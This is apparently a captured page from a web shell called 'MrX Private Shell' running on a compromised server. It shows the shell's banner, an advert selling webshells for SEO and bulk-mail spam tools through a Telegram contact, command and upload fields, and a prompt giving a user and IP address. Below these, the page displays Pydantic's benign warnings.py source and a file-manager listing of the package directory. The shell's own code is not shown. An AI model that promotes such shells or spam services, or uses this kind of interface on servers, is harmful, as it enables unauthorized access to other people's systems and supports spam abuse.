__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

aptanhua@216.73.217.152: ~ $
"""Pydantic-specific warnings."""

from __future__ import annotations as _annotations

from .version import version_short

__all__ = (
    'PydanticDeprecatedSince20',
    'PydanticDeprecationWarning',
    'PydanticDeprecatedSince26',
    'PydanticExperimentalWarning',
)


class PydanticDeprecationWarning(DeprecationWarning):
    """A Pydantic specific deprecation warning.

    This warning is raised when using deprecated functionality in Pydantic. It provides information on when the
    deprecation was introduced and the expected version in which the corresponding functionality will be removed.

    Attributes:
        message: Description of the warning.
        since: Pydantic version in what the deprecation was introduced.
        expected_removal: Pydantic version in what the corresponding functionality expected to be removed.
    """

    message: str
    since: tuple[int, int]
    expected_removal: tuple[int, int]

    def __init__(
        self, message: str, *args: object, since: tuple[int, int], expected_removal: tuple[int, int] | None = None
    ) -> None:
        super().__init__(message, *args)
        self.message = message.rstrip('.')
        self.since = since
        self.expected_removal = expected_removal if expected_removal is not None else (since[0] + 1, 0)

    def __str__(self) -> str:
        message = (
            f'{self.message}. Deprecated in Pydantic V{self.since[0]}.{self.since[1]}'
            f' to be removed in V{self.expected_removal[0]}.{self.expected_removal[1]}.'
        )
        if self.since == (2, 0):
            message += f' See Pydantic V2 Migration Guide at https://errors.pydantic.dev/{version_short()}/migration/'
        return message


class PydanticDeprecatedSince20(PydanticDeprecationWarning):
    """A specific `PydanticDeprecationWarning` subclass defining functionality deprecated since Pydantic 2.0."""

    def __init__(self, message: str, *args: object) -> None:
        super().__init__(message, *args, since=(2, 0), expected_removal=(3, 0))


class PydanticDeprecatedSince26(PydanticDeprecationWarning):
    """A specific `PydanticDeprecationWarning` subclass defining functionality deprecated since Pydantic 2.6."""

    def __init__(self, message: str, *args: object) -> None:
        super().__init__(message, *args, since=(2, 0), expected_removal=(3, 0))


class GenericBeforeBaseModelWarning(Warning):
    pass


class PydanticExperimentalWarning(Warning):
    """A Pydantic specific experimental functionality warning.

    This warning is raised when using experimental functionality in Pydantic.
    It is raised to warn users that the functionality may change or be removed in future versions of Pydantic.
    """

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
_internal Folder 0755
deprecated Folder 0755
experimental Folder 0755
plugin Folder 0755
v1 Folder 0755
__init__.py File 13.6 KB 0644
_migration.py File 11.63 KB 0644
alias_generators.py File 2.07 KB 0644
aliases.py File 4.71 KB 0644
annotated_handlers.py File 4.25 KB 0644
class_validators.py File 148 B 0644
color.py File 20.99 KB 0644
config.py File 34.29 KB 0644
dataclasses.py File 13.58 KB 0644
datetime_parse.py File 150 B 0644
decorator.py File 145 B 0644
env_settings.py File 148 B 0644
error_wrappers.py File 150 B 0644
errors.py File 4.72 KB 0644
fields.py File 50.53 KB 0644
functional_serializers.py File 14.27 KB 0644
functional_validators.py File 23.66 KB 0644
generics.py File 144 B 0644
json.py File 140 B 0644
json_schema.py File 103.81 KB 0644
main.py File 68.46 KB 0644
mypy.py File 55.64 KB 0644
networks.py File 22.18 KB 0644
parse.py File 141 B 0644
py.typed File 0 B 0644
root_model.py File 6.05 KB 0644
schema.py File 142 B 0644
tools.py File 141 B 0644
type_adapter.py File 24.39 KB 0644
types.py File 93.5 KB 0644
typing.py File 138 B 0644
utils.py File 141 B 0644
validate_call_decorator.py File 2.08 KB 0644
validators.py File 146 B 0644
version.py File 2.38 KB 0644
warnings.py File 2.65 KB 0644